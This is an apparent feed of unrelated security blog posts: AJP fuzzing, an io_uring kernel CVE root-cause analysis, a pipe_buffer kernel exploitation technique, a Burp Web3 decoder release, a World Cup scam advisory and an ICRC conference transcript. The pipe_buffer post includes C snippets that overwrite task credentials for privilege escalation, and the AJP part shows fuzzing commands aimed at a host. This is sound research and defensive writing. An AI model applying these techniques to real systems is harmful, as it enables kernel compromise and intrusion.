[*] Received message description 'Send a chunk of the body from the servlet container to the web server.
Content (HEX):
0x3C68656C6C6F3E646F79656E7365633C2F68656C6C6F3E0A
Content (Ascii):
<hello>doyensec</hello>
'
[*] 2022-10-13 23:02:46.859


00000000 41 42 00 1C 03 00 18 3C 68 65 6C 6C 6F 3E 64 6F AB.....<hello>do
00000010 79 65 6E 73 65 63 3C 2F 68 65 6C 6C 6F 3E 0A 00 yensec</hello>..


[*] Received message type 'End Response'
[*] Received message description 'Marks the end of the response (and thus the request-handling cycle). Reuse? Yes'
[*] 2022-10-13 23:02:46.86

The server AJP connector will receive an AJP message with the following structure:

AJP schema wireshark

The combination of libajp13, AJPFuzzer and the Wireshark AJP13 dissector made it easier to understand the protocol and play with it. For example, another noteworthy test case in AJPFuzzer is named genericfuzz. By using this command, it’s possible to perform fuzzing on arbitrary elements within the AJP request, such as the request attributes name/value, secret, cookies name/value, request URI path and much more:

$ AJPFuzzer> connect 192.168.80.131 8009
connect 192.168.80.131 8009
[*] Connecting to 192.168.80.131:8009
Connected to the remote AJP13 service

$ AJPFuzzer/192.168.80.131:8009> genericfuzz 2 "HTTP/1.1" "/" "127.0.0.1" "127.0.0.1" "127.0.0.1" 8009 false "Cookie:AAAA=BBBB" "secret:FUZZ" /tmp/listFUZZ.txt

AJP schema fuzz

Takeaways

Web binary protocols are fun to learn and reverse engineer.

For defenders:

  • Do not expose your AJP interfaces in hostile networks. Instead, consider switching to HTTP/2
  • Protect the AJP interface by enabling a shared secret. In this case, the workers must also include a matching value for the secret

CVE-2021-3491: Triggering a Linux Kernel io_uring Overflow

14 November 2022 at 10:15

Introduction:

Linux kernel vulnerability research has been a hot topic lately. A lot of great research papers got published lately. One specific topic that was interesting is io_uring.

At Haboob, we decided to start a small research to investigate one of the published CVEs, specifically CVE-2021-3491. 

Throughout this blogpost, we will explain io_uring fundamentals, its use-case and the advantage it offers. We’ll also walk through CVE-2021-3491 from root-cause to PoC development.

Everyone loves kernel bugs it seems, buckle up for a quick fine ride!         

Why io_uring?

Io_uring is a new subsystem that is rapidly changing and improving. It’s ripe for research!

It’s very interesting to see how it internally works and how it interacts with the kernel.

- io_uring: what is it?

According to the manuals: io_uring is a Linux-specific API for asynchronous I/O. It allows the user to submit one or more I/O requests, which are processed asynchronously without blocking the calling process. io_uring gets its name from ring buffers which are shared between user space and kernel space. This arrangement allows for efficient I/O, while avoiding the overhead of copying buffers between them, where possible. This interface makes io_uring different from other UNIX I/O APIs, wherein, rather than just communicate between kernel and user space with system calls, ring buffers are used as the main mode of communication.


Root Cause:

After checking the io_uring source code commit changes in (fs/io_uring.c), we start tracing the differences between the patched version and the unpatched version, and try to realize the cause of the bug.

We first notice that in struct io_buffer the “len”  is defined as sign int32 that is being used as the length for buffer.



Then, we also notice that in io_add_buffers, when attemping to access the struct: buf->len was assigned without checking the data type and MAX_RW_COUNT.



We found that there is a multiplication (p->len * p->nbufs) in io_provide_buffers_prep which leads to integer overflow when (p->len > 0x7fffffff) executes. Then it will bypass the access check during the access_ok() function call.



When we perform te  IORING_OP_READV operation with the selected buffer, we can bypass the MAX_RW_COUNT:



Using “R/W” on “/proc/self/mem” will force the kernel to handle our request using mem_rw function. From the arguments the “count” is received as size_t then passed to min_t() as an integer which will return a negative number in “this_len”.

Access_remote_vm function will receive “this_len” as a negative number which will result in copying more PAGE_SIZE bytes to the page, which results to a heap overflow.



Triggering the Bug:

We will go through the details of how the bug is triggered to achieve a kernel panic that can lead to a heap overflow.

 

Step1:

The following code snippet will interact with “proc” to open a file descriptor for “/proc/self/mem” and extract an address from “/proc/self/maps” to attempt to read from it:

Step2:

We need to prepare the buffer using the function “io_uring_prep_provide_buffers()” with length 0x80000000 to trigger the integer overflow vulnerability:

Step3:

Using iovec struct with 2 dimensional buffer, we assign the “len” as 0x80000000 to bypass MAX_RW_COUNT:

Step4:

When we do IORING_OP_READV operation on “file_fd” using offset “start_address” we can read the content of “/proc/self/mem” with that offset using the selected buffer:


POC

We can trigger kernel panic with the following PoC:


Resources

https://manpages.ubuntu.com/manpages/lunar/man7/io_uring.7.html

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d1f82808877bb10d3deee7cf3374a4eb3fb582db

CVE-2021-3491: Triggering a Linux Kernel io_uring Overflow

pipe_buffer arbitrary read write

By: Jayden R
8 November 2022 at 09:10

Introduction

In this post we will look at an arbitrary read/write technique that can be used to achieve privilege escalation in a variety of Linux kernel builds. This has been used practically against Ubuntu builds, but the technique is amenable to other targets such as Android. It is particularly useful in cases where ARM64 User Access Override mitigates the common technique of setting addr_limit to ULONG_MAX.  

The pipe_buffer technique was discovered independently by the author, but a recent Blackhat talk suggested the technique is being used in the wild. The technique provides an intuitive way to gain arbitrary read/write, so we suspect that it’s been used widely for a long time. 

The technique

The technique targets the page pointer of a pipe buffer. In ordinary pipe operations, this page stores data which was written through a pipe. The data may then be loaded from the page into userspace through a read operation.  By overwriting said page pointer we’re able to read from and write to arbitrary locations in the physical address space. This includes the kernel heap, targeting sensitive objects such as task descriptors and credentials, as well the writeable pages of the kernel image itself.  

struct pipe_buffer

The pipe_buffer array is a common heap-allocated structure targeted in Linux kernel exploitation. By leaking a pipe_buffer element, we are able to deduce the kernel (virtual) base address. In overwriting the pipe_buffer we’re typically able to gain code execution. 

Each pipe is managed by the pipe_inode_info data structure. The pipe_buffer array comes automatically with every pipe. It is pointed to by the field pipe_inode_info::bufs and is treated as a ring through the pipe_inode_info::tail and pipe_inode_info::head indices.  

The array is allocated from the memcg slab caches. It may be a variety of sizes. In particular we can have our pipe_buffer array be of size n * sizeof(struct pipe_buffer) where n is a power of 2. With fcntl(pipe_fd, F_SETPIPE_SZ, PAGE_SIZE * n) we can alter the pipe ring size.  

A single element in the pipe_buffer array is structured as follows: 

struct pipe_buffer { 
       struct page *page; 
       unsigned int offset, len; 
       const struct pipe_buf_operations *ops; 
       unsigned int flags; 
       unsigned long private; 
}; 

The typical leak and overwrite target is the pipe_buf_operations pointer. This is great if a ROP chain is sufficient to gain full privileges, however on some platforms such as Android this is not sufficient. For arbitrary read/write we will use the page pointer instead. 

struct page

The kernel represents physical memory using struct page objects. These are all stored in a single array which we will call vmemmap_base (its symbol on some common platforms).  

When we write to a pipe, the kernel reserves a new page to store our data. This page can then be spliced onto other pipes or have its contents copied back out from the read-side of the pipe. 

static ssize_t pipe_write(struct kiocb *iocb, struct iov_iter *from) 
{ 
. . . 
       for (;;) { 
. . . 
              if (!pipe_full(head, pipe->tail, pipe->max_usage)) { 
. . . 
                     struct page *page = pipe->tmp_page; 
. . . 
                     if (!page) { 
                            page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT); 
                            if (unlikely(!page)) { 
                                   ret = ret ? : -ENOMEM; 
                                   break; 
                            } 
                            pipe->tmp_page = page; 
                     } 
. . . 
/* Insert it into the buffer array */ 
buf = &pipe->bufs[head & mask]; 
buf->page = page; 
buf->ops = &anon_pipe_buf_ops; 
buf->offset = 0; 
buf->len = 0; 
. . . 
copied = copy_page_from_iter(page, 0, PAGE_SIZE, from); 

As we can see here, alloc_page() returns a new page from the page allocator. A pipe_buffer is then initialised to encapsulate the page. The user-supplied contents are copied into it. The exact mechanics of the page allocator is outside the scope of this post, but just think of it as a free-list of available physical pages.  

The central question for this technique is: assuming we can corrupt a pipe_buffer, are we able to set pipe_buffer::page to the struct page representing a sensitive region of memory? We will look at two applications. The first targets heap memory and involves straightforward arithmetic. The second targets the kernel image itself and may require some additional brute-forcing. 

Read and write into the kernel heap 

We will further split this into two cases. In the first case, we assume that we know where a target object is in the heap. In the second case, we assume that we don’t know where a target object is in memory and we need to find it.

With only a leaked struct page pointer we can:

  • Deduce the vmemmap_base address
  • Calculate the physical page loadpoint of the heap base
  • Repeatedly increment, scale, and rewrite the page pointer to seek across the heap

Suppose we’re targeting the object with virtual address 0xffff98784d431d00 and we’ve leaked the struct page address 0xffffebea044d9f00. Both are randomized with KASLR. 

Through the mask 0xfffffffff0000000 & 0xffffebea044d9f00 we get 0xffffebea00000000 for vmemmap_base

First, we ask the question: how can we choose the struct page which corresponds to the target object in the heap? Clearly, this target struct page will be vmemmap + offset. But what offset? Since the vmemmap array corresponds directly to physical memory and since the heap base is not typically (physically) randomized, we can use the simple formula:

vmemmap_base
+ ((0x100000000 >> 12) * 0x40)
+ (((target_object & 0xffffffff) >> 12) * 0x40) 

Indexing the target object’s page

The result of this formula gives the virtual address for the struct page element of the vmemmap array corresponding to the physical page which underlies our target object. A few questions remain: what is that 0x100000000? Why shift by 12? Why scale by 0x40? 

Luckily for us, the physical heap base is not randomized. It starts at physical address 0x100000000.  The 12-shift returns the “index” of the page in memory. For example, the address 0x100000000 corresponds to the 0x100000000 >> 12 page of memory. Finally, the 0x40-scale corrects the bytes offset in the vmemmap_base array according to the size of the elements. In other words, 0x40 is the size of a single struct page. The analogous operation is:
int x[N]; int y = x[3]; which retrieves the value at &x + (3 * sizeof(int))

So in plain words, the formula says: 
Take the vmmemap base address and displace up to the struct page of the first physical page of heap memory. Then displace by the number of pages between the bottom of the heap and the target object. 

If we set the pipe_buffer::page to the result then we will be able to read/write to the page of the target object. Note that objects can lie over multiple pages. So it’s important to determine the page relative to the target field(s) of an object rather than just from the beginning of the object.  

This can be used to set the pipe_buffer fields as follows: 

uint64_t cred_page = virt_to_page(target_obj, vbase); 
uint64_t cred_off = (target_obj & 0xfff); 
 
pbuf->page = (long *)cred_page; 
pbuf->offset = cred_off + 0x4; 
pbuf->len = 0; 
pbuf->ops = (long *)FAKE_OPS; 
pbuf->flags = PIPE_BUF_FLAG_CAN_MERGE; 
pbuf->private = 0; 
... 
write(dest_pipe.wr, zeroes, 0x20); 

where virt_to_page() is the implementation of the formula. As the reader can see, we targeted the cred object of our task, overwriting the *id fields with zeroes to escalate privileges. This assumes we already know the virtual address of our task credentials.

Manipulating the page pointer of a pipe buffer

On the other hand, we might not yet know the address. In this case we would need to seek through the heap to identify our task_struct and then our struct cred. One way to do this is to use prctl() to change our task’s name just before searching for it. Since prctl() changes the task_struct::comm field to the new name we can use this, as well as some other determinants, to confirm that we’ve found the task_struct

To do this, we loop with i over (vmemmap_base + ((0x100000000 >> 12) * 0x40)) + (0x40 * i), writing it back as the pipe_buffer::page. We can then repeatedly leak heap memory, halting when we find our task_struct. Once we’ve read out this final leak we’ll have our cred virtual address. From here, we are in the first case again as shown above. This likely means we need to retrigger the vulnerability a substantial number of times.  

Avoiding reallocation

One possible scenario is when we know the address of our object replacement in memory but not the address of our target object. For example, we know the address of a msg_msgseg which has overlaid a pipe_buffer array but not the address of the credentials which we ultimately need to overwrite.  

If this is the case, then we can repeatedly overwrite the seeker pipe_buffer by setting the page pointer of an overwriter pipe to the seeker pipe_buffer page. This works as follows:

  1. Calculate the struct page address of the seeker pipe_buffer page.
  2. Create another pipe – our overwriter.
  3. Trigger the use-after-free and write to the seeker pipe_buffer::page its own page.
  4. Call tee() with the seeker pipe as source and the overwrite pipe as destination.

Now we have a reliable way to overwrite the seeker pipe_buffer without reallocating it. We can use this in the following way:

void set_new_pipe_bufs_overwrite(char *buf, struct pipe_struct *overwrite, 
                                 char *obj_in_page, struct pipe_buffer *pbuf, 
                                 uint64_t new_page, uint32_t len, int *tail) 
{ 
    if(read(overwrite->read, buf, PAGE_SIZE) != PAGE_SIZE) 
        error_out("read overwriter_pipe[0]"); 
 
    struct pipe_buffer *setpbuf = (struct pipe_buffer *) obj_in_page; 
    setpbuf += (*tail) % 8; 
    (*tail)++;

    *setpbuf = *pbuf;
    setpbuf->page = (void *) new_page; 
    setpbuf->len = len; 
 
    if (write(overwrite->write, buf, PAGE_SIZE) != PAGE_SIZE) 
        error_out("write overwriter_pipe[1]"); 
} 

The read() sets the overwriter’s pipe_inode_info::tmp_page to the seeker pipe_buffer object’s underlying page. This temporary page can then we written to directly. After this, we construct the new pipe_buffer in our buffer. Finally, we write out the new seeker pipe_buffer with the overwriter pipe. Behind the scenes, the kernel copies the given contents into the physical page represented by the overwriter pipe’s pipe_inode_info::tmp_page. This circumvents repeated reallocation of the use-after-free object.

Reading and writing to the kernel image

Let’s suppose that we need to target a variable in the kernel image itself. Or that we don’t want to seek through the whole heap, instead opting to traverse a list such as via init_task to find our task and then our cred. Can we just leak a kernel image virtual address (e.g. pipe_buffer::ops) and then use the virt_to_page() formula as before?  

On x86 systems, with KASLR enabled, this is not possible. The option CONFIG_RANDOMIZE_BASE for this architecture randomizes the physical load address and the virtual base address separately. That is, one cannot be used to derive the other.  

To discover the kernel image base we need to have leaked a struct page pointer (or else have a partial overwrite primitive of the first qword of a pipe_buffer). We also need to know a byte pattern in the kernel image, at some offset, to confirm when we’ve found our target page.  

Let’s take the first qword of Ubuntu 22.04: 0x4801e03f51258d48 which introduces the startup_64 function. We’ll seek from some offset in vmemmap until we find this byte pattern at the first leaked qword read from our corrupted pipe_buffer.  But doesn’t this mean we need to seek across every single page a hard slog in 0x40 byte increments?

Luckily, the kernel can’t be loaded at any arbitrary physical address. It’s constrained by CONFIG_PHYSICAL_ALIGN. It will also be randomized above CONFIG_PHYSICAL_START. So we need only check in CONFIG_PHYSICAL_ALIGN increments.

Further, for ARM64 systems Kconfig has something different to say:

CONFIG_RANDOMIZE_BASE randomizes the virtual address at which the kernel image is loaded, as a security feature that deters exploit attempts relying on knowledge of the location of kernel internals.

This is most interesting for Android and means that physical base randomization needs to be implemented by third-party vendors.  

Regardless, it’s demonstrably feasible to brute-force the randomized physical base without any optimization. However, one method to speed things up is to search by increments of
(N * CONFIG_PHYSICAL_ALIGN) and in a single leak check that any of the qwords of the N offsets of the kernel image, are present.

For example, in Ubuntu’s case we have the alignment 0x200000. But we don’t want to check every 0x200000th physical address for the startup_64 qword. So we seek by (0x200000 * 8) at a time and check for any of 8 known qword at offsets (0x200000 * (0 < n < 9)) in the kernel image. Once we find one, we displace backwards by the right offset and we’ve got the physical base. 

bool search_phys_base(const char *buf, int64_t x, 
                          uint64_t *scroll_page) 
{ 
#define QWORD2 0x95e8e58948f63155 
#define QWORD3 0x6548478b4c48ec83 
#define QWORD4 0x000004c8908b0000 
#define QWORD5 0xb0458948ffffff60 
#define QWORD6 0x04ba550000441f0f 
#define QWORD7 0x4500000233840f40 
#define QWORD8 0x2524894865f8010f 
#define scale_offset(i) (((((0x200000) * i) >> 12) * 0x40)) 
 
    uint64_t first_qword = ((uint64_t *)buf)[0]; 
 
    switch (first_qword) { 
        case STARTUP_QWORD_5_15: 
            break; 
        case QWORD2: 
            *scroll_page -= scale_offset(1); 
            break; 
        case QWORD3: 
            *scroll_page -= scale_offset(2); 
            break; 
. . .

Once we’ve got the struct page representing the physical base, we can easily derive the struct page for the target object in the kernel image as the kernel image pages are ordered to be physically contiguous. For example, 
uint64_t init_task_page = kbase_page + ((INIT_TASK_OFF >> 12) * 0x40); where INIT_TASK_OFF is the known offset of the init_task in the kernel image. 

Additional considerations

Limiting factors 

As outlined above, we need to leak (or partially overwrite) a struct page pointer. We may also need to brute-force up to the physical base page for the kernel image. This latter factor can increase the running time of an exploit which uses this technique.  

It’s also not possible to write to read-only kernel memory through this method. We can’t just alter some system call’s implementation to run our own shellcode. An extension of the technique might, however, target page tables directly in order to switch permission bits to then write out to read-only memory.  

Grace factors 

The Linux memory model sees physical page frames as a substratum of raw memory – ready to be linked with virtual addresses, or used directly, when storing and loading data. This allows us to use kernel pages in pipes where there really ought to only be user pages. Further, we may be able to target other process’ user pages to leak secrets or corrupt internal data anyway. So armed with knowledge of kernel page dynamics, as well as with a pipe_buffer corruption primitive, it is possible to do very interesting things in the physical address space. 

The post pipe_buffer arbitrary read write appeared first on Interrupt Labs.

Tool Release – Web3 Decoder Burp Suite Extension

10 November 2022 at 19:13

Web3 Decoder is a Burp Suite Extension that allows to decode “web3” JSON-RPC calls that interact with smart contracts in a EVM blockchain.

As it is said that a picture is worth a thousand words, the following two screenshots shows a Raw JSON-RPC call, and its decoded function call:

Raw eth_call to Ethereum Node
Decoded eth_call to Uniswap

Background

When auditing a DApp (Decentralized Application), its main database would usually be the state of the blockchain, and in particular, the state of a different set of smart contracts deployed in that network. The communication with these smart contract functions is made usually through the use of JSON-RPC calls to a blockchain node, that will be able to query the state of an smart contract, or send a signed transaction that modify its state.

As a pentester, a security auditor, or an enthusiast that wants to better understand what is going on on that DApp, or what smart contracts are being used and how, this is a tedious task, as JSON-RPC call data is RLP encoded. Fortunately for us, it is very common that projects publish their source code and verify their smart contracts in block explorers like Etherscan, and there is where our extension comes in handy, by consulting these block explorers, obtaining the ABI (Application Binary Interface) of the called smart contract, and decoding in a human readable format, its contents for us.

Installation

  1. Clone our github repository: https://github.com/nccgroup/web3-decoder
  2. (Optional). Create a virtualenv or install the application prerequisites in your system (see section below)
  3. Add as a Python extension the file burp_web3_decoder.py
  4. Update your block explorer API keys to be able to perform more than 1 request every 5 seconds (more information on the README.md page)
  5. Start hacking!

We recommend following these instructions on the README.md page of the github repository (which we will keep updated!)

Supporting Python3 Library and Precompiled Binaries

This extension requires python3 libraries like web3.py that unfortunately are not available for python 2.7 to be used directly with Jython 2.7. As a ‘hack’, the main functionality is written in a python 3 library that is being executed by the extension through a python virtual environment (talking about dirty…)

I have created precompiled binaries of the python3 library used, for Linux, Windows and Mac OSX. The extension will use these binaries unless it is able to execute the supporting library, directly or through a python virtual environment.

For better performance or development, you can create a virtualenv, and install as follows:

git clone https://github.com/nccgroup/web3-decoder 
cd "web3-decoder"
virtualenv -p python3 venv
source venv/bin/activate
pip install -r libs/requirements.txt

How It Works

The burp extension creates a new Editor Tab when detecting a valid JSON-RPC request or response. It performs a eth_chainId JSON-RPC request to the node in use to detect which chain we are working on, and depending on the chain, selects a block explorer API, by searching in the chains.json file.

The Extension has the following capabilities

  • Decode of eth_call JSON-RPC calls
  • Decode of eth_sendRawTransaction JSON-RPC calls (and their inner functions)
  • Decode of response results from eth_call
  • Support for re-encoding of eth_call decoded functions
  • Automatic download of the smart contract ABI called from etherscan APIs (if the contract is verified)
  • Decode of function inputs both in eth_call and eth_sendRawTransaction
  • Decode of function inputs that uses “Delegate Proxy” contracts
  • Decode of function inputs called via “Multicall” contracts
  • Manual addition of contract ABIs for contracts that are not verified in etherscan
  • Support for other compatible networks (check the chains.json file)

As an example of use, to decode function calls, we need the ABI (Application Binary Interface) of the contract, which contains all functions that can be called in the contract and their inputs and outputs. For now, it works with verified contracts in the block explorer, or by manually adding the ABI. In future releases, we will explore the possibility of automatically generating an ABI by searching the function selectors in public databases.

The following “flow” diagram shows in a simplified way the process that the eth_decoder library follows when decoding eth_call JSON-RPC calls:

Flow Diagram of decoding an ETH CALL to a smart contract function

Chains Supported so far

All supported chains can be found in the chains.json file.
These are chains that have a block explorer with the same APIs as etherscan.

At the moment of writing, the following list of EVM chains were supported by this extension:

  • Ethereum Mainnet
  • Ropsten
  • Rinkeby
  • Goerli
  • Optimism
  • Cronos
  • Kovan
  • BSC
  • Huobi ECO
  • Polygon
  • Fantom
  • Arbitrum
  • Sepolia
  • Aurora
  • Avalanche

If you want to add more blockchain explorers, add them to the chains.json file, test that it works, and make a pull request! (Or if you are not sure of how to do all this, simply create an issue asking for it!)

Future Work

  • Aggregate other types of Proxy / Multicall contracts
  • Decode Functions without ABI based on public Ethereum signature databases such as 4byte.directory or offline panoramix 4byte signature database

I am always more than happy to consider adding new features to the extension or the supporting library, so feel free to come by the Github page and create an issue with any features that you may want! (or with any bug that you find!)

Don’t Get Caught Offsides with These World Cup Scams

9 November 2022 at 12:03

Authored by: Christy Crimmins and Oliver Devane

Football (or Soccer as we call it in the U.S.) is the most popular sport in the world, with over 3.5 billion fans across the globe. On November 20th, the men’s World Cup kicks off (pun intended) in Qatar. This event, a tournament played by 32 national teams every four years, determines the sport’s world champion. It will also be one of the most-watched sporting events of at least the last four years (since the previous World Cup). 

An event with this level of popularity and interest also attracts fraudsters and cyber criminals looking to capitalize on fans’ excitement. Here’s how to spot these scams and stay penalty-free during this year’s tournament. 

New Cup, who’s this? 

Phishing is a tool that cybercriminals have used for years now. Most of us are familiar with the telltale signs—misspelled words, poor grammar, and a sender email whose email address makes no sense or whose phone number is unknown. But excitement and anticipation can cloud our judgment. What football fan wouldn’t be tempted to win a free trip to see their home team participate in the ultimate tournament? Cybercriminals are betting that this excitement will cloud fans’ judgment, leading them to click on nefarious links that ultimately download malware or steal personal information. 

It’s important to realize that these messages can come via a variety of channels, including email, text messages, (also known as smishing) and other messaging channels like WhatsApp and Telegram. No matter what the source is, it’s essential to remain vigilant and pause to think before clicking links or giving out personal or banking information.  

For more information on phishing and how to spot a phisher, see McAfee’s “What is Phishing?” blog. 

Real money for fake tickets 

According to ActionFraud, the UK’s national reporting center for fraud and cybercrime, thousands of people were victims of ticket fraud in 2019—and that’s just in the UK. Ticket fraud is when someone advertises tickets for sale, usually through a website or message board, collects the payment and then disappears, without the buyer ever receiving the ticket.  

 

The World Cup is a prime (and lucrative) target for this type of scam, with fans willing to pay thousands of dollars to see their teams compete. Chances are most people have their tickets firmly in hand (or digital wallet) by now, but if you’re planning to try a last-minute trip, beware of this scam and make sure that you’re using a legitimate, reputable ticket broker. To be perfectly safe, stick with well-known ticket brokers and those who offer consumer protection. Also beware of sites that don’t accept debit or credit cards and only accept payment in the form of bitcoin or wire transfers such as the one on the fake ticket site below:  

The red box on the right image shows that the ticket site accepts payment via Bitcoin.  

Other red flags to look out for are websites that ask you to contact them to make payment and the only contact information is via WhatsApp. 

Streaming the matches 

Let’s be realistic—most of us are going to have to settle for watching the World Cup from the comfort of our own home, or the pub down the street. If you’re watching the tournament online, be sure that you’re using a legitimate streaming service. A quick Google of “FIFA World Cup 2022 Official Streaming” along with your country should get you the information you need to safely watch the event through official channels. The FIFA site itself is also a good source of information.  

Illegal streaming sites usually contain deceptive ads and malware which can cause harm to your device.  

Don’t get taken to the bank 

In countries or regions where sports betting is legal, the 2022 World Cup is expected to drive an increase in activity. There’s no shortage of things to bet on, from a simple win/loss to the exact minute a goal will be scored by a particular player. Everything is subject to wager.   

As with our previous examples, this increase in legitimate gambling brings with it an increase in deceptive activity. Online betting scams often start when users are directed to or search for gambling site and end up on a fraudulent one. After placing their bets and winning, users realize that while they may have “won” money, they are unable to withdraw it and are even sometimes asked to deposit even more money to make winnings available, and even then, they still won’t be. By the end of this process, the bettor has lost all their initial money (and then some, potentially) as well as any personal information they shared on the site.  

Like other scams, users should be wary of sites that look hastily put together or are riddled with errors. Your best bet (yes, again, pun intended) is to look for an established online service that is approved by your government or region’s gaming commission. Finally, reading the fine print on incentives or bonuses is always a good idea. If something sounds too good to be true, it’s best to double-check. 

For more on how you can bet online safely, and for details on how legalized online betting works in the U.S., check out our blog on the topic.  

Keep that Connection Secure 

Using a free public Wi-Fi connection is risky. User data on these networks is unprotected, which makes it vulnerable to cyber criminals. Whether you’re traveling to Qatar for a match or watching the them with friends at your favorite pub, if you’re connecting to a public Wi-Fi connection, make sure you use a trusted VPN connection. 

Give scammers a straight red card this World Cup 

For more information on scams, visit our scam education page. Hopefully, with these tips, you’ll be able to enjoy and participate in some of the World Cup festivities, after all, fun is the goal!  

The post Don’t Get Caught Offsides with These World Cup Scams appeared first on McAfee Blog.

LABScon Replay | Are Digital Technologies Eroding the Principle of Distinction in War?

By: LABScon
10 November 2022 at 14:09

Until now, the cyber capabilities of a State have been primarily assessed on a technical and tactical perspective: the coordination of APT teams, the quality of malware, and the sophistication of exploits, to give some examples. However, describing such cyber operations is no longer sufficient to understand the capabilities that States deploy in the digital sphere during armed conflicts.

Cyber activities are part of a broader context, the digital one. Armies in conflict are increasingly digitized as are the involved populations. States may encourage civilians to engage in offensive cyber operations against targets associated with the enemy or encourage users to contribute to the military effort.

In this presentation, One Click from Conflict: Are Digital Technologies Eroding the Principle of Distinction in War?, the ICRC’s Mauro Vignati discusses how technology has completely transformed the way civilians live through armed conflicts.

In recent conflicts, smartphones and apps especially have become weaponized, slowly removing traditional barriers that divide the roles of civilians and combatants. Mauro breaks down the dangers and consequences of this paradigm shift and discusses what states and private organizations can do to stop technological weaponization from harming civilians caught in wartime.

One Click from Conflict: Are Digital Technologies Eroding the Principle of Distinction in War?: Audio automatically transcribed by Sonix

One Click from Conflict: Are Digital Technologies Eroding the Principle of Distinction in War?: this mp4 audio file was automatically transcribed by Sonix with the best speech-to-text algorithms. This transcript may contain errors.

Mauro Vignati:
Hi everyone. Thank you for having. Oh.

Mauro Vignati:
ICRC today, International Red Cross. So just
look at who knows, who knows what we do and

Mauro Vignati:
who we are. Just raise your hand. Okay.

Mauro Vignati:
So just to refresh the memory. So we are an
international organization, a humanitarian

Mauro Vignati:
organization. We are based in Geneva,
Switzerland. So our mandate is to provide

Mauro Vignati:
humanitarian help and help victims of armed
conflict in relief operations. And when there

Mauro Vignati:
is a need.

So and you start to think about why we are
here, right? What is doing humanitarian

organization here? So it’s because we are
seeing with the digitalization of societies

there is an increase, a transformation of how
the wars are fought. So states are adding

more and more digital means and methods to
their arsenal. And one of the worst trends we

are seeing nowadays is that digital
technologies are bringing civilians and

private sector technology companies into the
battlefield. So when I talk about private

companies, I mean cybersecurity companies,
technology companies that are bringing into

the battlefield. So one of the most important

principles in ICRC is international

humanitarian law. This is a body of law. And
one of the most important principles in this

law is that we define two main groups of
individuals and objects.

So the first one is the combatants, and the
military objectives and the competence are

the people that are fighting on behalf of an
army. And the second group are the civilians

and then civilians objects.

Mauro Vignati:
And they should refrain from the resource.
They should refrain to a combat to go in the

Mauro Vignati:
battlefield, and thus they should be
protected against the arms and dangers that

Mauro Vignati:
the war is producing.

Mauro Vignati:
So this is the principle of distinction. So
we have to distinguish between who is

Mauro Vignati:
fighting the war and the rest of the
population.

So and this shift in the digital
technologies, so is bringing us to a to a

qualitative aspect, 1 to 1 qualitative
aspect, one quantitative one. So from the

qualitative perspective, so the
digitalization of societies is bringing some

some effect. One of them is that this
lowering the threshold of entering the

battlefield. So with some exaggeration, we
can say that everyone with a smartphone

nowadays can join the battlefield and do
something for an army to a conflict. And the

other perspective is that is also modifying
completely, modifying the sense of remoteness

that we have. So we can sit in our couch and
we can participate to to the battlefield on

the other side of of the planet. And from a
quantitative perspective is that the states

can scale up a massive amount of civilians to
do what they need to do, like hundreds of

thousands of civilians regrouping them in
hours, in days to be able to fight for them.

And another perspective is the expansion of
the attack surface. So the same smartphone

that they can use to attack could be also a
victim of of of an attack.

Mauro Vignati:
So it’s not just the smartphone, laptop,
computer server, whatever. So the attack

Mauro Vignati:
surface is way bigger than what we have in
the physical world. So this brings us to the

Mauro Vignati:
civilization. So we call the civilization of
the battlefield. So based on that, let’s have

Mauro Vignati:
a couple of scenarios to better explain the
situation and the challenges we are facing

Mauro Vignati:
here.

So the first scenario is about states that
may encourage civilians to engage in

offensive cyber operations against targets
associated with the enemy. So it’s the states

that is asking its own civilians to
participate to a conflict in the digital

battlefield. So this has multiple advantages
for a state so individual can be easily

mobilized and coordinated. So as I said
before, you can put together hundreds of

thousands of people to fight in your name and
you can federate all already existing

activists that they can be deployed for, for
your purpose and all those characteristics

that bring us to this lower cost for entering
the battlefield and for the states to fight

in the battlefield because they can use the
civilians to do this work. So this is the

first scenario we are talking about. The
second scenario is

that the states may repurpose existing
e-government apps or create new ones that

will be used for the battlefield.

Mauro Vignati:
So here we are talking. In about two states
that are provide an app that you can use to,

Mauro Vignati:
for instance, take a picture of a tank of the
enemy and then send them back to a to the to

Mauro Vignati:
the army, to the Central Command and control
and be used for the effort on the on the

Mauro Vignati:
kinetic side. So this has multiple advantages
from the state’s perspective because you are

Mauro Vignati:
tapping into an existing community of digital
citizens.

So can you imagine if you if you have a new
government app that is being used by three or

four or 5 million of people that some point,
you transform, you enhance this application

providing new methods in the application, and
then you provide these applications, this new

version of applications to already three or
four or five million people that are already

using these applications. So they are tapping
into this kind of situation. So this means

that you don’t need any training for the
people that are using the application because

they are already used using these
applications. So it’s everything. We open

download, take a picture, and send the
picture. This is a normal gesture we do

daily, so no training is required. This also
means that there is no latency. You don’t

have to train military people on the ground.
You just have civilians in the in the digital

battlefield that can adapt and use this
application in a very quick way.

Mauro Vignati:
And this means that the civilians are
becoming sensor sensors to the army, not just

Mauro Vignati:
for intelligence purposes, but for any other
kind of activity that the state would like to

Mauro Vignati:
start in in the digital battlefield. This
brings us to a third scenario where we have

Mauro Vignati:
the presence of technology companies, and
cybersecurity companies. And so, generally

Mauro Vignati:
speaking, private companies are jumping into
the digital battlefield.

So as you may know, I mean, the majority of
the networks are owned or managed by private

companies and they are also managing asset
that our military asset, not only civilian

assets. So when war start those companies,
they are inside the battlefield because they

are already providing support or they are
managing the networks of those governmental

bodies. So this may bring us to the
characteristic of that. Those companies are

defending against deliberate cyber attacks.
If you are already providing this kind of

situation to a to governmental bodies, you
find yourself in in defending against

deliberate cyber attacks and you share threat
intelligence with government bodies, with

states that are at the moment in war. So
those are the three scenarios of how

civilians and and private companies are
involved in the battlefield. And these are,

first a first batch of consideration about
the situation that we are expecting we are

seeing since the moment. So apt so state
sponsored cyber attack is not the only way to

assess no more, the only way to assess state
capabilities in the digital sphere.

Mauro Vignati:
So we have a lot of more digital means and
method that has to be integrated when we do

Mauro Vignati:
an analysis of the capacity of a state in
these in this sector. The second one is that

Mauro Vignati:
the private company of civilians are now
playing a preponderant role in the conflict.

Mauro Vignati:
What I mean with this is that when an army is
losing visibility or capability on the on the

Mauro Vignati:
on the battle ground, they can use civilians
to regain this visibility, this capability,

Mauro Vignati:
and even surpass the capability of a state in
the battlefield. So the consideration is that

Mauro Vignati:
we are assisting a civilization of the
battlefield that is is is a trend since the

Mauro Vignati:
moment now.

And this is a worrisome trend because we are
bringing civilians into the battlefield. So a

second a second package of of considerations
that we still lack this cognitive process. So

